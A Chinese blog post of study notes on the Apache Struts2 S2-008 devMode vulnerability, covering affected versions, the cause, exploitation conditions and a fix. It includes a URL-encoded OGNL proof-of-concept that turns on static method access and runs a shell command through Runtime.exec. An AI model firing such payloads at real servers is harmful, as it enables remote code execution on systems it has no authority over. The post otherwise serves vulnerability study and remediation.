(RCE)(Struts2)s2-008漏洞学习笔记

于 2024-07-19 23:37:26 发布
阅读量210 收藏 5
点赞数 8
文章标签: struts 学习 笔记 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaaadoga/article/details/140561722
版权

写在前面

这篇文章是关于作者学习s2-008漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
环境获取
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.3.17

漏洞原理

开启devMode模式后,struts2应用会有多个调试接口能直接查看对象信息或直接执行命令

利用条件/测试场景

1.利用条件
开启devMode模式
2.测试场景
看到url中有debug字段就可以测试

利用方法

将debug参数设置为command,后面直接跟OGNL表达式就可以了
PoC:&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@java.lang.Runtime@getRuntime().exec(%22touch%20/tmp/success%22))

如何修复
紧急处理方法

关掉devMode就好了

补丁修复方法
h4ckb0ss
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3368
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
struts2漏洞S2-021
ymy131931的博客
05-08 1995
前段时间这个漏洞吵得比较火,最近研究了一下tomcat底层代码,结合struts2的框架源码跟踪了一下这个漏洞的触发过程。在整个debug过程中,感触颇多,遂留下此文以作三思笔记,不敢奢望太多,只希望对感兴趣的童鞋有所帮助,大牛飘过。如果文中哪里有不准确之处,还望各位积极拍砖指正。 0x00 老漏洞新玩法 关于利用,不得不先说一下S2-020这个漏洞,其实之前网上已经有相关文档讲述S...
Struts2 RCE 漏洞初探
small_whitehat的博客
03-03 632
Struts2 RCE 漏洞初探
网络安全深入学习第三课——热门框架漏洞RCEStruts2远程代码执行)
p36273的博客
09-16 539
----- Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。------ Struts框架本身分为三个部分:核心控制器FilterDispatcher、业务控制器Action和用户实现的企业业务逻辑组件。
Struts2远程代码执行漏洞复现
02-04 520
Struts2远程代码执行漏洞介绍、原理和复现,以及怎么使用工具检测。
Struts2-062_RCE的简单复现(CVE-2021-31805)
ANYOUZHEN的博客
06-04 651
漏洞描述:漏洞等级:高危漏洞本次漏洞复现为本地环境,使用开源靶场中的环境:输入指令:docker-compose up -d --buildsudo docker-compose up -d接下来启动漏洞扫描: 但是在我的kali2022上面出现了报错:解决办法在网上找到了一篇大佬文章:[Linux] docker 出现Got permission denied while trying to connect to the Docker daemon socket...问题的解决办法_Cloudeeee
Struts2-062_RCE简单复现(CVE-2021-31805)
crowsec
04-18 2336
2022年04月13号,apache官网公布了Struts2 最新版远程代码执行漏洞,该漏洞编号为CVE-2021-31805。 Apache Struts2是一个用于开发Java EE网络应用程序的Web框架。在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 本次漏洞是对CVE-2020-17530修复之后的绕过,当使用语法%{...}应用强制OGNL解析,某些tag标签的属性仍然可以被二次解析。
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3745
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)
03-09
S2-045漏洞是一个严重的远程代码执行(RCE漏洞,存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,对系统安全构成极大威胁。Struts2.3.32的发布就是...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。 描述 此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是 S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037 S2-045 S2-048 S2-053 S2-057 S2-DevMode 加载扩展 Burp Suite- > Extender- > Add- > Select the Struts.jar file- > Next. 一旦加载而没有任何错误,将在现有的burp实例中弹出一个新选项卡。 用法 只需右键单击所选请求,然后单击“检查S
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 807
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 572
从2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞Struts2框架...
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 901
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
CVE-2021-31805 Apache struts2 (RCE)
最新发布
Ethan_cfq的博客
04-13 626
代码执行后的结果,此处我们可以清楚的看到 ”id“ 被成功执行!在重放模块中重放此请求方法,可成功执行代码 ”id“访问index.action。
Struts2_001_RCE 漏洞复现
ADummy的博客
02-04 422
Struts2_001_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 我们来了解一下Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提
BurpSuite插件 -- Struts2-RCE
qq_50854662的博客
09-24 496
​好遗憾,明明不想失去,却又无能为力,说真的,那种想放弃又想爱的滋味,真折磨人。。。。 ----  网易云热评 一、插件介绍 一个用于检查struts2 RCE漏洞的Burp扩展器   二、下载地址(插件作者:prakharathreya) https://github.com/prakharathreya/Struts2-RCE   三、安装插件 ...
Struts2_048_RCE CVE-2017-9791 漏洞复现
ADummy的博客
02-19 949
Struts2_048_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ 在Struts 2.3.x 版本上的Showcase 插件ActionMessage类中,通过构建不可信的输入可实现远程命令攻击。漏洞成因是当ActionMessage接收客户可控的参数数据时,由于后续数据拼接传递后处理不当导致任意代码执行。 ​ 影响版本 2.3.x 0x02漏洞复现 payload1(RC
Struts2 S2-020漏洞在Tomcat 8下的动态RCE攻击研究
总结来说,本文的核心知识点包括Struts2框架的S2-020漏洞原理、动态类加载特性对静态分析的影响、基于反射的属性枚举方法,以及如何利用Ognl表达式进行潜在的RCE攻击。通过这篇文章,读者可以学习到如何在实际的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值